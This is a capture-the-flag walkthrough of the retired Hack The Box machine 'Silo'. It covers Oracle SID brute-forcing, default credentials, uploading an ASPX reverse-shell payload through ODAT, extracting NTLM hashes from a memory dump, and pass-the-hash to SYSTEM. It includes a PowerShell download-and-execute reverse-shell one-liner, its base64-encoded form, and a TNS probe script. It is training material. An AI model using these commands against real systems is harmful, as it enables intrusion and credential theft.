Today we are going to solve another CTF challenge, “Silo”, which is available online for those who want to sharpen their penetration testing and black-box testing skills. Silo is a retired vulnerable lab from Hack The Box, which offers a collection of vulnerable labs as challenges ranging from beginner to expert level so you can practise according to your experience.
Level: Expert
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are available online they have static IPs; Silo’s IP is 10.10.10.82, so let’s begin with nmap port enumeration.
root@kali:~/htb/silo# nmap -sC -sV -oA nmap 10.10.10.82
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-25 14:27 EDT
Nmap scan report for 10.10.10.82
Host is up (0.031s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-03-25 14:29:41
|_  start_date: 2019-03-24 18:16:47

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.28 seconds
We have an Oracle database listening remotely on port 1521 (TNS listener 11.2.0.2.0, i.e. 11g Express Edition). To connect to it we need a valid SID and credentials.
First we need the SID of the Oracle instance, so we use Metasploit’s sid_brute module to brute-force it from a wordlist. The listener refuses a connect request for an unknown SID with an ORA-12505 error, which is what lets the module tell valid SIDs from invalid ones.
msf5 > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > set rhost 10.10.10.82
rhost => 10.10.10.82
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
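The following Python script is an added example, not part of the original writeup or of the Metasploit module. It shows what sid_brute does on the wire: it builds a TNS CONNECT packet whose connect descriptor names a candidate SID, parses the listener’s reply, and treats a REFUSE carrying ERR=12505 or ERR=12514 as “unknown SID” while any other answer means the listener recognised the name. The `probe` PROGRAM/USER strings in the descriptor and the constructed sample replies (make_refuse, make_accept, modelled on an 11g listener) are assumptions for offline testing; probe_sid performs the live exchange.

```python
import re
import socket
import struct
import sys

# TNS packet types (byte 4 of the 8-byte Oracle Net header)
TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_RESEND = 1, 2, 4, 5, 11
TNS_HEADER_LEN = 8
CONNECT_DATA_OFFSET = 58   # header (8) + fixed CONNECT body (50) precede the descriptor


def build_connect(sid: str, host: str, port: int = 1521) -> bytes:
    """Build a TNS CONNECT packet whose connect descriptor names the SID to probe."""
    connect_data = (
        f"(DESCRIPTION=(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=probe)(HOST=probe)(USER=probe)))"
        f"(ADDRESS=(PROTOCOL=TCP)(HOST={host})(PORT={port})))"
    ).encode()
    body = struct.pack(
        ">10HIBB",
        0x0136,               # TNS version 310
        0x012C,               # lowest compatible version 300
        0x0000,               # service options
        0x0800,               # session data unit size
        0x7FFF,               # maximum transmission data unit size
        0x7F08,               # NT protocol characteristics
        0x0000,               # line turnaround value
        0x0001,               # the value 1 in hardware byte order
        len(connect_data),    # length of the connect descriptor
        CONNECT_DATA_OFFSET,  # offset of the descriptor from packet start
        0x00000000,           # maximum receivable connect data
        0x01, 0x01,           # connect flags 0 and 1
    )
    body += b"\x00" * 24      # trace cross-facility items, unique connection id, unused
    total = TNS_HEADER_LEN + len(body) + len(connect_data)
    # header: packet length, packet checksum, type, reserved, header checksum
    header = struct.pack(">HHBBH", total, 0, TNS_CONNECT, 0, 0)
    return header + body + connect_data


def parse_response(data: bytes) -> dict:
    """Parse the TNS header of the listener's reply and, for REFUSE, the ORA error code."""
    if len(data) < TNS_HEADER_LEN:
        raise ValueError("short TNS packet")
    length, _csum, ptype, _rsvd, _hcsum = struct.unpack(">HHBBH", data[:TNS_HEADER_LEN])
    resp = {"type": ptype, "length": length, "err": None, "refuse_data": ""}
    if ptype == TNS_REFUSE and len(data) >= 12:
        # REFUSE body: user reason (1), system reason (1), refuse data length (2), refuse data
        _ureason, _sreason, rlen = struct.unpack(">BBH", data[8:12])
        resp["refuse_data"] = data[12:12 + rlen].decode("ascii", errors="replace")
        m = re.search(r"\(ERR=(\d+)\)", resp["refuse_data"])
        if m:
            resp["err"] = int(m.group(1))
    return resp


def classify(resp: dict) -> str:
    """Decide what the reply says about the SID we probed."""
    if resp["type"] == TNS_REFUSE:
        # ORA-12505: listener does not know of SID; ORA-12514: does not know of service name
        if resp["err"] in (12505, 12514):
            return "unknown"
        return "refused"      # listener knew the name but refused the connection for another reason
    if resp["type"] in (TNS_ACCEPT, TNS_REDIRECT, TNS_RESEND):
        return "valid"
    return f"other(type={resp['type']})"


def make_refuse(err: int) -> bytes:
    """Constructed sample reply shaped like an 11g listener REFUSE packet (offline testing only)."""
    refuse = (f"(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR={err})"
              f"(ERROR_STACK=(ERROR=(CODE={err})(EMFI=4))))").encode()
    body = struct.pack(">BBH", 0x22, 0x00, len(refuse)) + refuse
    return struct.pack(">HHBBH", TNS_HEADER_LEN + len(body), 0, TNS_REFUSE, 0, 0) + body


def make_accept() -> bytes:
    """Constructed sample ACCEPT reply; only the header type matters for classification."""
    body = struct.pack(">H", 0x0136) + b"\x00" * 14
    return struct.pack(">HHBBH", TNS_HEADER_LEN + len(body), 0, TNS_ACCEPT, 0, 0) + body


def probe_sid(host: str, sid: str, port: int = 1521, timeout: float = 5.0) -> str:
    """Send one CONNECT for `sid` and classify the listener's answer (live network call)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connect(sid, host, port))
        return classify(parse_response(s.recv(4096)))


if __name__ == "__main__":
    # usage: python tns_sid_probe.py 10.10.10.82 XE PLSExtProc ORCL
    target, *sids = sys.argv[1:]
    for sid in sids:
        print(f"{sid:20s} {probe_sid(target, sid)}")
```

Each probe is a single TCP connection with no authentication, so it shows up in the listener log as a refused or accepted connect from your host; a SIEM rule that counts ORA-12505 refusals per source is the matching detection.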
After installing ODAT (Oracle Database Attacking Tool), the next step is to find which accounts still use default or weak credentials, using a list of Oracle default credentials.
After testing, we find a working default credential:
Username: scott
Password: tiger
Connecting as scott with --sysdba, we can already read root.txt with ODAT’s externaltable module. The external-table trick needs privileges (such as CREATE ANY DIRECTORY) that scott’s own CONNECT/RESOURCE roles do not include, which is why the SYSDBA connection matters; the --getFile arguments are the remote directory, the remote file name and the local file name to save it under:
./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba
We can also talk to the database directly with SQL*Plus after downloading the Oracle Instant Client tools from https://www.oracle.com/technetwork/topics/winx64soft-089540.html.
Let’s try to log in:
c:\PENTEST\Oracle_instantclient_18_5>sqlplus -L scott/tiger@10.10.10.82
SQL*Plus: Release 18.0.0.0.0 - Production on Tue Mar 26 15:01:29 2019
Version 18.5.0.0.0
Copyright (c) 1982, 2018, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days

Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SP2-0310: unable to open file "LOGIN.SQL"
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

SQL>
As scott, the account only holds CONNECT and RESOURCE. The interesting question is whether the listener accepts the same password AS SYSDBA, which would mean scott has been granted the SYSDBA privilege (such accounts are listed in v$pwfile_users). A SYSDBA session runs as SYS, so user_role_privs will then show SYS’s roles rather than SCOTT’s. Let’s try:
c:\PENTEST\Oracle_instantclient_18_5>sqlplus -L scott/tiger@10.10.10.82/XE as sysdba
SQL*Plus: Release 18.0.0.0.0 - Production on Tue Mar 26 16:11:19 2019
Version 18.5.0.0.0
Copyright (c) 1982, 2018, Oracle. All rights reserved.

Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SP2-0310: unable to open file "LOGIN.SQL"
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
SYS                            EXP_FULL_DATABASE              YES YES NO
SYS                            GATHER_SYSTEM_STATISTICS       YES YES NO
SYS                            HS_ADMIN_EXECUTE_ROLE          YES YES NO
SYS                            HS_ADMIN_ROLE                  YES YES NO
SYS                            HS_ADMIN_SELECT_ROLE           YES YES NO
SYS                            IMP_FULL_DATABASE              YES YES NO
SYS                            LOGSTDBY_ADMINISTRATOR         YES YES NO
SYS                            OEM_ADVISOR                    YES YES NO
SYS                            OEM_MONITOR                    YES YES NO
SYS                            PLUSTRACE                      YES YES NO
SYS                            RECOVERY_CATALOG_OWNER         YES YES NO
SYS                            RESOURCE                       YES YES NO
SYS                            SCHEDULER_ADMIN                YES YES NO
SYS                            SELECT_CATALOG_ROLE            YES YES NO
SYS                            XDBADMIN                       YES YES NO
SYS                            XDB_SET_INVOKER                YES YES NO
SYS                            XDB_WEBSERVICES                YES YES NO
SYS                            XDB_WEBSERVICES_OVER_HTTP      YES YES NO
SYS                            XDB_WEBSERVICES_WITH_PUBLIC    YES YES NO

32 rows selected.
We are unable to get a shell with reverse_tcp, so we use the reverse_https payload instead. We build a 64-bit payload because the SQL*Plus banner (“64bit Production”) tells us the host is a 64-bit Windows server; the nmap scan only narrows it down to Windows Server 2008 R2 - 2012.
root@kali:~/htb/silo# msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.10.14.20 lport=443 -f aspx > Shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 748 bytes
Final size of aspx file: 4869 bytes
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://10.10.14.20:443
Using ODAT’s dbmsxslprocessor module (which writes files on the database host through DBMS_XSLPROCESSOR.CLOB2FILE), we upload the ASPX payload into the IIS webroot, C:\inetpub\wwwroot, which nmap showed being served on port 80:
./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" shell.aspx /tmp/Shell.aspx --sysdba
As soon as we request the uploaded page (http://10.10.10.82/shell.aspx), IIS executes it and we get a reverse shell in the handler.
Enumerating the file system, we find two files in “C:\Users\Phineas\Desktop”: “user.txt” and “Oracle issue.txt”. Reading user.txt gives us the first flag.
Reading “Oracle issue.txt”, we find a Dropbox link and a password whose first character is not rendered correctly in the Kali terminal.
The unrecognized character turns out to be the pound sign (£). With that password we log in to Dropbox, find a zip file and download it to our machine.
Unzipping it gives a memory dump (SILO-20180105-221806.dmp), which we investigate with Volatility. The Win2012R2x64 profile matches Windows Server 2012 R2; hivelist locates the registry hives in memory:
volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist
hivelist gives the virtual addresses of the SYSTEM and SAM hives. hashdump needs both, -y for SYSTEM (from which the boot key that encrypts the SAM is derived) and -s for SAM, to recover the stored NTLM hashes:
volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
With these hashes we can use pass-the-hash (PtH), since port 445 is open: NTLM authentication only needs the NT hash, never the plaintext password. Each line is user:RID:LM:NT. The LM field aad3b435b51404eeaad3b435b51404ee is the “empty” LM hash, meaning no LM hash is stored, and Guest’s NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password.
As we have the NT hash for “Administrator”, we use pass-the-hash to get a privileged shell.
root@kali:~/htb/silo# msfconsole
=[ metasploit v5.0.2-dev ]
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set smbuser Administrator
smbuser => Administrator
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
smbpass => aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
msf5 exploit(windows/smb/psexec) > set rhost 10.10.10.82
rhost => 10.10.10.82
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.20:4444
[*] 10.10.10.82:445 - Connecting to the server...
[*] 10.10.10.82:445 - Authenticating to 10.10.10.82:445 as user 'Administrator'...
[*] 10.10.10.82:445 - Selecting PowerShell target
[*] 10.10.10.82:445 - Executing the payload...
[+] 10.10.10.82:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.10.10.82:49163) at 2019-03-26 09:08:35 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The same hash works with pth-winexe:
root@kali:~/htb/silo# pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
silo\administrator
With Impacket’s psexec.py, which uploads a service binary to the ADMIN$ share and starts it, so the shell runs as SYSTEM:
root@kali:~/htb/silo# python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file JbNIPTbN.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service cKNz on 10.10.10.82.....
[*] Starting service cKNz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
And with Impacket’s wmiexec, which runs commands over WMI without dropping a service binary (quieter, but it is a semi-interactive shell and runs as the Administrator account rather than SYSTEM). From there we pull a PowerShell reverse shell with a web-delivery one-liner served from our machine:
c:\PENTEST>wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
silo\administrator
C:\>cmd.exe /c powershell.exe -nop IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.82 - - [26/Mar/2019 18:00:05] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.82: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.82] 49171: NO_DATA
Windows PowerShell running as user Administrator on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\>whoami
silo\administrator
PS C:\> type c:\users\administrator\desktop\root.txt
cd3*****af6
PS C:\>
pth-wmic doesn’t work on 64-bit Kali, whereas pth-winexe works with no issues; apparently this has been a problem since 2013.
Instead of passing the quoted one-liner through cmd.exe, we can hand it to PowerShell as an encoded command. PowerShell’s -EncodedCommand expects base64 of the UTF-16LE text, hence the iconv step (it must be UTF-16LE; plain UTF-16 emits a byte-order mark first), and -w 0 keeps base64 from wrapping the output. Note that echo appends a trailing newline, which ends up in the blob; it is harmless here, and echo -n avoids it. Let’s first encode our web-delivery string:
root@kali:~# echo "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADQANAAzAC4AcABzADEAJwApAAoA
c:\PENTEST>wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
silo\administrator
C:\>cmd.exe /c powershell.exe -nop -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADQANAAzAC4AcABzADEAJwApAAoA
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.82: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.82] 49173: NO_DATA
Windows PowerShell running as user Administrator on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\>whoami
silo\administrator
PS C:\> [System.Environment]::Is64BitProcess
True
PS C:\> [System.Environment]::Is64BitOperatingSystem
True
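An added example, not from the original post: the same -EncodedCommand encoding done in Python, plus the inverse, which is what a defender needs when a process-creation (4688) or PowerShell script-block (4104) event shows `powershell -enc ...`. It reproduces the page’s blob exactly, including the trailing newline that echo appended, and pulls encoded arguments out of a full command line. The regex covering the -e/-ec/-en/-enc/-EncodedCommand spellings is my own assumption about which prefixes are worth matching.

```python
import base64
import re

COMMAND = "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
# The blob the page produced with: echo "<COMMAND>" | iconv --to-code UTF-16LE | base64 -w 0
PAGE_BLOB = "aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADQANAAzAC4AcABzADEAJwApAAoA"


def encode_ps_command(script: str, trailing_newline: bool = False) -> str:
    """-EncodedCommand takes base64 of UTF-16LE text without a BOM; UTF-8 input decodes to garbage."""
    text = script + ("\n" if trailing_newline else "")   # echo without -n appends this newline
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


def decode_ps_command(blob: str) -> str:
    """Inverse: recover the script from an -enc blob, tolerating stripped '=' padding."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw.decode("utf-16le")


# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
_ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def extract_encoded_commands(cmdline: str) -> list:
    """Decode every -e/-ec/-enc/-EncodedCommand argument found in a process command line."""
    return [decode_ps_command(m.group(1)) for m in _ENC_ARG.finditer(cmdline)]


if __name__ == "__main__":
    blob = encode_ps_command(COMMAND, trailing_newline=True)
    print("reproduces the page's blob:", blob == PAGE_BLOB)
    cmdline = "cmd.exe /c powershell.exe -nop -enc " + blob
    for script in extract_encoded_commands(cmdline):
        print(repr(script))
```

The decoder is deliberately lenient about padding because command lines captured by EDR or Sysmon are sometimes truncated or have the trailing "=" stripped; the encoder is strict about UTF-16LE because that is the only encoding PowerShell will accept for this switch.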
Author: Jacco Straathof